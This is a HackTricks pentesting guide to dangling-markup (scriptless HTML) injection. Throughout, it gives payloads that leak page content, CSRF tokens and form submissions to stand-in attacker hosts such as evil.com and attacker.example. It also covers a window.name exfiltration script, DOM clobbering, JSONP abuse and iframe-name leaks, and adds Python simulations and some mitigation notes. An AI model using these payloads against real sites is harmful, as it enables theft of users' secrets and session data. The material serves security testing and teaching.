hacktricks/pentesting-web/dangling-markup-html-scriptless-injection (2024-02-10)

Dangling Markup - HTML scriptless injection


Summary

This technique can be used to extract information from a user when an HTML injection is found. It is very useful if you cannot find any way to reach XSS but you can inject some HTML tags.
It is also useful if some secret is saved in clear text in the HTML and you want to exfiltrate it from the client, or if you want to mislead the execution of some script.

Several techniques commented here can be used to bypass some Content Security Policies by exfiltrating information in unexpected ways (HTML tags, CSS, http-equiv meta tags, forms, base...).

Main Applications

Stealing clear text secrets

If you inject <img src='http://evil.com/log.cgi? then, when the page loads, the victim's browser sends you all the markup between the injected img tag and the next single quote in the page, as part of the image URL. If a secret is located in that chunk, you steal it. You can do the same thing with a double quote; check which of the two encloses the more interesting chunk, because the leak stops at the first matching quote.
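As an added example (not part of the original page), the following Python script simulates what the victim's browser does with the dangling <img src= payload: it renders a constructed page in which a comment is reflected unescaped above a form holding a hypothetical CSRF token, runs the result through Python's html.parser (which, like a browser, lets a quoted attribute value run across newlines and tags), and reports which chunk would be sent to the attacker's collector URL. It tries both quote styles to show why the choice matters, and contrasts the vulnerable renderer with one that HTML-encodes the reflected value. The page template, field names, token value and collector URL are all made up for the demonstration.

```python
import html
from html.parser import HTMLParser

# Constructed victim page (hypothetical): a comment is reflected unescaped
# above a form carrying a CSRF token; a single-quoted href follows the form.
PAGE_TEMPLATE = """<html><body>
<p>Last comment: {comment}</p>
<form action="/transfer" method="post">
  <input type="hidden" name="csrf_token" value="8f3a1c9d">
  <input type="text" name="amount">
</form>
<a href='/logout'>Log out</a>
</body></html>"""

SECRET = "8f3a1c9d"                                  # the token we want to steal
COLLECTOR = "http://attacker.example/log?html="      # hypothetical attacker logger


class ImgSrcCollector(HTMLParser):
    """Records every <img src> the parser sees, i.e. the URLs the browser would request."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value)


def requested_img_urls(page_html):
    parser = ImgSrcCollector()
    parser.feed(page_html)
    parser.close()
    return parser.srcs


def render_vulnerable(comment):
    """Reflects the comment verbatim: HTML injection."""
    return PAGE_TEMPLATE.format(comment=comment)


def render_hardened(comment):
    """Contextual output encoding: <, >, &, " and ' become entities, so the
    injected text can never open a tag or an attribute."""
    return PAGE_TEMPLATE.format(comment=html.escape(comment, quote=True))


def dangling_img(quote):
    """The payload: an <img> whose src attribute is opened but never closed."""
    return f"<img src={quote}{COLLECTOR}"


def leaked_chunk(url):
    """What the attacker's logger receives after the collector prefix."""
    return url[len(COLLECTOR):] if url.startswith(COLLECTOR) else ""


def best_quote(render):
    """Try both quote styles; return (quote, chunk) for the first one whose
    swallowed markup contains the secret, or None if neither does."""
    for quote in ("'", '"'):
        for url in requested_img_urls(render(dangling_img(quote))):
            chunk = leaked_chunk(url)
            if SECRET in chunk:
                return quote, chunk
    return None


if __name__ == "__main__":
    for quote in ("'", '"'):
        for url in requested_img_urls(render_vulnerable(dangling_img(quote))):
            print(f"quote {quote} leaks: {leaked_chunk(url)!r}")
    print("best quote:", best_quote(render_vulnerable))
    print("hardened page requests:", requested_img_urls(render_hardened(dangling_img("'"))))
```

On this page the single-quote payload swallows the whole form (token included) because the next single quote is in the href after it, while the double-quote payload stops at the first double quote, right after `<form action=`. The hardened renderer produces no image request at all, which is the check to run against a fix.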

If the img tag is forbidden (due to CSP for example) you can also use <meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?

<img src='http://attacker.com/log.php?HTML=
<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=
<meta http-equiv="refresh" content='0;URL=ftp://evil.com?a=

Note that Chrome blocks HTTP URLs containing "<" or "\n", so you could try other protocol schemes such as "ftp" (keep in mind that recent Chrome versions have dropped ftp:// support entirely, so check the victim's browser).

You can also abuse CSS @import: it will send all the code until it finds a ";" (the injected <style> must be allowed by the page's style-src for the request to go out).

<style>@import//hackvertor.co.uk?     <--- Injected
<b>steal me!</b>;

You can also use a <table tag with a dangling background attribute:

<table background='//your-collaborator-id.burpcollaborator.net?'

You could also insert a <base tag. All the information up to the closing quote ends up in the injected attribute, but this one requires user interaction: with <base target=' the swallowed HTML becomes the default target (the window name) for every link, so when the user clicks a link that points to a page you control, that page can read the leaked markup from window.name (see the CSP bypass section below):
<base target='        <--- Injected
steal me'<b>test</b>

Stealing forms

Inject a <base href='http://evil.com/'> tag and every relative URL that follows it, including the action of the next form, is resolved against the attacker's origin, so the form (with its CSRF token and whatever the user types) is submitted to the attacker. No script is needed, so this works where a CSP blocks inline JavaScript; the CSP directives that restrict it are base-uri and form-action, and the real fix is contextual output encoding of any user-controlled data inserted into the HTML.

<base href='http://evil.com/'>

Stealing forms 2

Inject a form tag: <form action='http://evil.com/log_steal'>. It takes precedence over the next form tag (the HTML parser ignores a <form> start tag while another form is open), so all the data of that form will be sent to the attacker.

Stealing forms 3

The button can change the URL where the information of the form is going to be sent with the attribute "formaction":

<button name=xss type=submit formaction='https://google.com'>I get consumed!

Stealing clear text secrets 2

Using the form-stealing technique above (injecting a new form tag) you can then inject a new input field:

<input type='hidden' name='review_body' value="

and this input field will contain all the content between its double quote and the next double quote in the HTML. This attack mixes "Stealing clear text secrets" with "Stealing forms 2".

You can do the same thing injecting a form and an <option> tag. All the data until a closing </option> is found will be sent. Note that only text content survives: the parser drops tags found inside a select, and an <input>, <textarea> or <script> tag closes the select, which limits how far the leak reaches:

<form action=http://google.com><input type="submit">Click Me</input><select name=xss><option

Form parameter injection

You can change the action of a form and insert new values so that an unexpected action is performed:

<form action='/change_settings.php'>
<input type='hidden' name='invite_user'
value='fredmbogo'>                                        ← Injected lines

<form action="/change_settings.php">                        ← Existing form (ignored by the parser)
...
<input type="text" name="invite_user" value="">             ← Subverted field
...
<input type="hidden" name="xsrf_token" value="12345">
...
</form>
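As an added example (not code from the original page), this Python script models the parser rule behind the diagram above: while a form is open, a nested <form> start tag is ignored and every input is associated with the form opened first. It feeds a constructed settings page (hypothetical field names and attacker host) through html.parser, computes the body the user's click would submit, and then shows how a backend that takes the first value of a duplicated parameter and one that takes the last value (PHP does the latter) disagree about invite_user. It also covers the "Stealing forms 2" variant, where the injected form carries the attacker's action.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode

# Constructed settings page (hypothetical): user-controlled text is reflected
# unescaped in a banner right before the real form.
PAGE_TEMPLATE = """<html><body>
<div class="banner">{reflected}</div>
<form action="/change_settings.php">
  <input type="text" name="invite_user" value="">
  <input type="hidden" name="xsrf_token" value="12345">
  <input type="submit" value="Save">
</form>
</body></html>"""

# Variant 1: keep the action, pre-fill a parameter (form parameter injection).
INJECT_PARAM = ("<form action='/change_settings.php'>"
                "<input type='hidden' name='invite_user' value='fredmbogo'>")
# Variant 2: redirect the whole submission to the attacker ("Stealing forms 2").
INJECT_STEAL = "<form action='http://attacker.example/log'>"   # hypothetical host


class FormPointerSimulator(HTMLParser):
    """Models the HTML5 'form element pointer': while a form is open, a nested
    <form> start tag is a parse error and is dropped, every <input> belongs to
    the form opened first, and </form> clears the pointer."""

    def __init__(self):
        super().__init__()
        self.forms = []      # each: {"action": str, "fields": [(name, value), ...]}
        self.current = None  # the form element pointer

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            if self.current is not None:
                return       # nested <form> ignored: the injected one wins
            self.current = {"action": attrs.get("action", ""), "fields": []}
            self.forms.append(self.current)
        elif tag == "input" and self.current is not None:
            if (attrs.get("type") or "text").lower() == "submit":
                return       # a submit button is only sent when it is the one clicked
            name = attrs.get("name")
            if name:
                self.current["fields"].append((name, attrs.get("value") or ""))

    def handle_endtag(self, tag):
        if tag == "form":
            self.current = None


def submission(page_html):
    """Return (action, urlencoded body) for the form the user ends up submitting."""
    sim = FormPointerSimulator()
    sim.feed(page_html)
    sim.close()
    form = sim.forms[0]
    return form["action"], urlencode(form["fields"])


def server_views(body):
    """Duplicate-parameter handling differs per backend: first value wins in
    e.g. Java Servlets and Flask's request.args.get, last value wins in PHP."""
    params = parse_qs(body, keep_blank_values=True)
    first = {k: v[0] for k, v in params.items()}
    last = {k: v[-1] for k, v in params.items()}
    return first, last


if __name__ == "__main__":
    cases = (("benign", "hello"), ("param injection", INJECT_PARAM), ("form stealing", INJECT_STEAL))
    for label, reflected in cases:
        action, body = submission(PAGE_TEMPLATE.format(reflected=reflected))
        first, last = server_views(body)
        print(f"{label:16} -> {action}  body={body}")
        print(f"{'':16}    first-wins={first}  last-wins={last}")
```

The submitted body for the parameter-injection case is invite_user=fredmbogo&invite_user=&xsrf_token=12345: the legitimate CSRF token rides along, and whether the attacker's value is the one acted upon depends entirely on the backend's duplicate-parameter rule, which is worth checking for the target stack before relying on this.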

Stealing clear text secrets via noscript

The <noscript></noscript> tag holds content that is rendered only when the browser does not support JavaScript or has it disabled (in Chrome you can toggle it at chrome://settings/content/javascript).

Given an injection point on a web page, a way to exfiltrate the content from that point to the bottom of the page to an attacker-controlled site is to inject the following. Everything up to the next </textarea> lands in the textarea value, tags included, because textarea content is parsed as raw text; with JavaScript enabled the payload is inert, since the noscript content is then treated as text:

<noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>

Bypassing CSP with user interaction

From this PortSwigger research you can learn that even in the most restricted CSP environments you can still exfiltrate data with some user interaction. In this case we are going to use the payload:

<a href=http://attacker.net/payload.html><font size=100 color=red>You must click me</font></a>
<base target='

Note that you ask the victim to click a link that takes them to a page you control. Also note that the target attribute of the base tag swallows the HTML content up to the next single quote, and that value becomes the name of the browsing context the link opens in.
Therefore, as you control the page the victim lands on after clicking the link, you can read that HTML from window.name and exfiltrate it:

<script>
if(window.name) {
  new Image().src='//your-collaborator-id.burpcollaborator.net?'+encodeURIComponent(window.name);
}
</script>

Misleading script workflow 1 - HTML namespace attack

Insert a new tag with an id inside the HTML that shadows the next element with the same id (document.getElementById returns the first match in document order) and with a value that will affect the flow of a script. In this example you are selecting with whom some information is going to be shared:

<input type='hidden' id='share_with' value='fredmbogo'>     ← Injected markup
...
Share this status update with:                              ← Legitimate optional element of a dialog
<input id='share_with' value=''>

...

function submit_status_update() {
...
request.share_with = document.getElementById('share_with').value;
...
}

Misleading script workflow 2 - Script namespace attack

Create variables inside the JavaScript global namespace by inserting HTML tags with an id (named element access on window, commonly called DOM clobbering). Then, this variable will affect the flow of the application:

<img id='is_public'>                                        ← Injected markup

...

// Legitimate application code follows

function retrieve_acls() {
...
if (response.access_mode == AM_PUBLIC)                    ← The subsequent assignment fails in IE
is_public = true;
else
is_public = false;
}

function submit_new_acls() {
...
if (is_public) request.access_mode = AM_PUBLIC;           ← Condition always evaluates to true
...
}

JSONP abuse

If you find a JSONP interface you could be able to call an arbitrary function with arbitrary data:

<script src='/editor/sharing.js'>:              ← Legitimate script
function set_sharing(public) {
if (public) request.access_mode = AM_PUBLIC;
else request.access_mode = AM_PRIVATE;
...
}

<script src='/search?q=a&call=set_sharing'>:    ← Injected JSONP call
set_sharing({ ... })

Or you could even try to execute some JavaScript:

<script src='/search?q=a&call=alert(1)'></script>

Iframe abuse

A child document possesses the capability to view and modify the location property of its parent, even in cross-origin situations. This allows the embedding of a script within an iframe that can redirect the client to an arbitrary page:

<html><head></head><body><script>top.window.location = "https://attacker.com/hacked.html"</script></body></html>

This can be mitigated by sandboxing the iframe without granting it allow-top-navigation. Note that sandbox='allow-scripts allow-top-navigation' does not help: allow-top-navigation is exactly the permission that lets the framed content navigate the top-level page; something like sandbox='allow-scripts' (or an empty sandbox value) is what blocks the redirect.

Leaking sensitive information using the iframe name attribute

Another way to abuse iframes is to leak sensitive information from a different page through the iframe name attribute: you inject HTML that makes the sensitive information land inside the name attribute of an iframe, then access that name from the framing page and leak it.

<script>
function cspBypass(win) {
win[0].location = 'about:blank';
setTimeout(()=>alert(win[0].name), 500);
}
</script>

<iframe src="//subdomain1.portswigger-labs.net/bypassing-csp-with-dangling-iframes/target.php?email=%22><iframe name=%27" onload="cspBypass(this.contentWindow)"></iframe>

For more info check https://portswigger.net/research/bypassing-csp-with-dangling-iframes

<meta abuse

You could use meta http-equiv to perform several actions, like setting a cookie: <meta http-equiv="Set-Cookie" Content="SESSID=1">, or performing a redirect (after 5 seconds in this case): <meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />. Note that current browsers ignore http-equiv="Set-Cookie" (dropped in Chrome 65 and Firefox 68), so in practice only the refresh redirect is still usable.

Note that CSP has no http-equiv directive, and a meta refresh is a navigation, which CSP does not govern: a policy such as Content-Security-Policy: default-src 'self' will not stop it. The fix is to prevent the injection itself (output encoding of user-controlled data).

New <portal HTML tag

You can find a very interesting research on exploitable vulnerabilities of the <portal tag here.
At the time of writing you need to enable the portal tag in Chrome at chrome://flags/#enable-portals or it won't work.

<portal src='https://attacker-server?

HTML Leaks

Not all the ways to leak connectivity in HTML will be useful for dangling markup, but sometimes they help. Check them here: https://github.com/cure53/HTTPLeaks/blob/master/leak.html

SS-Leaks

This is a mix between dangling markup and XS-Leaks. On one side, the vulnerability allows injecting HTML (but not JS) in a page of the same origin as the one we will be attacking. On the other side, we won't attack the page where we can inject HTML directly, but another page.

{% content-ref url="ss-leaks.md" %} ss-leaks.md {% endcontent-ref %}

XS-Search/XS-Leaks

XS-Search is oriented to exfiltrating cross-origin information by abusing side-channel attacks. Therefore, it's a different technique from dangling markup; however, some of its techniques abuse the inclusion of HTML tags (with and without JS execution), like CSS injection or lazy-loaded images.

{% content-ref url="../xs-search.md" %} xs-search.md {% endcontent-ref %}

Brute-Force Detection List

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt" %}
